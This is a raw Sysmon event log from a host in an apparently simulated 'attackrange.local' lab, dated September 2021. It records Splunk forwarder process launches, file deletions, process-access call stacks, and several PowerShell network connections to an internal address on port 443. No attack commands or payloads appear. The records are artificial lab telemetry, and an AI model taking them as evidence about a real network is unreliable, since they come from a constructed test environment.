154100x800000000000000035083412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.064{B81B27B7-4CDA-613A-1090-03000000C801}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:15.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FFC536170E9CAF2EE496B01B7500E22,SHA256=04C473809EA9F478BEB05E3479AB7D158B025B0EC13426F06E9543C750E0F031,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:16.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2109CCCDC59BD1AD76F0750A02A80AD,SHA256=4DB96EC61359948E4FC3F4AD2F7821FC244C7C10B116B5E90DB573C095878FDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:41.090{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56475-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:16.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6E5F0542AB3041F4775D8E74D19606FA,SHA256=02C60C26E326288050F9FF5A80E852557F2EBAEAEDA094317133F721B299CAAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:17.514{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=306DD84E9C167236D591FB5601F26328,SHA256=12FC9FBFAFE0FB95C9F0D17610C02FA6C55574CD58E544C4189CB3EED765FD7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:18.560{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58024C83140147BFF0FC6A1CBA46C8F0,SHA256=40DD370EACE6E728B37A50909F9697F83880CEEE264811E6BB38270FE1701DBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:42.188{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56476-false10.0.1.12-8000- 23542300x800000000000000035083430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:19.596{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF7F7060461F8F6312AFDFEA4F8A4E8,SHA256=1A367F2863736A38AA78EFA605814369159C64867FD566250984D19173A64316,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.611{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6161CD269F8996AC42C464CA6A8607B,SHA256=661AD7A1F351682E241BCC9EDD6622D99841849BF001A7EDC41D06990994F055,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:45.108{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56477-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.327{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D251FEC1BBFE32AF22499BB61D192541,SHA256=35145F0A2973DE7065766FB22FD246AAA6EBAE5F38A43D2E17DBFFDE786EDA14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:21.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=644FF3B2A19442E1B668CF19DCC37CB4,SHA256=6E6F0AB673EBFAACD91ED70BCA54A09F968B38F4A597F3644A05D717B48DB8CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:22.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C23BD186E718D9CF94998FDEC8B21D2D,SHA256=847003FF18AEA1D0A96C8525BD12BCF2FE24D5461704CF1C0986B7C11FC99E25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:23.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F03EE6AB1C46FD4686CE86875FA66B3,SHA256=55FF28708553244DA184D27C073113FE9B4809F3707F67DD530AD993E382087C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:24.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=906B80DB7C55838023D496E218F3C20F,SHA256=35C87B0B6898D9EBD98358838DD272619E5D097E12561E89F6B840A4766C84D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:49.119{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56479-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:48.104{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56478-false10.0.1.12-8000- 23542300x800000000000000035083437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:24.337{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9E35F46EDF48FD5346ACF4738C75D91B,SHA256=4A44EB7538F97AA030DECCE4C02CBBB149357603A4BCE82B99478501CA754D4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:25.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06561474BE9C0CD5CF3DF1B7D91B813F,SHA256=457738C08150770CB8575125D71DB058B065CC859F242793BB60BB26C93F9BAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:26.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DF0655A5AE87D4ABE0AF5C098807F7,SHA256=016EED85ACAAC45DD925D4401DFF3AA4AB90F30CC48CA6695768753D20798DC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:27.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B250B5DE91693DB2C243A543BDFFA4C4,SHA256=6357924ED2DE4839FAA1F3BBB9C74A22849A9B18C45AA28384F96095222E111B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D760F32BE6B2EDF3B77158B0585610,SHA256=041763C23A8A06DE038FEDB942A9DF6A86993C3C84AD5B2F471F8922BDA5534F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:28.302{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.287{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A63A1B13AFDC07E6A1ED25C3695E306,SHA256=CC2F70EF8366F47F3EF9591E68C2550DEC5B778FB1B6CCBC70C230B89C12E1D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:53.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56480-false10.0.1.12-8000- 23542300x800000000000000035083463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.301{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=722483DAE679821153B01521A92BF74D,SHA256=85C51C94CC31E35085940EF87CE2C5EDD5909AC957E661C56B38EE849B8917B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.301{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=795DB499E27C033CFBA036492BC645C5,SHA256=A64402693DF73FB84C00DD1946F1B2DD939249528257CA9C8BBAD84DFBAFAE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.164{B81B27B7-4CE8-613A-1290-03000000C801}47926080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 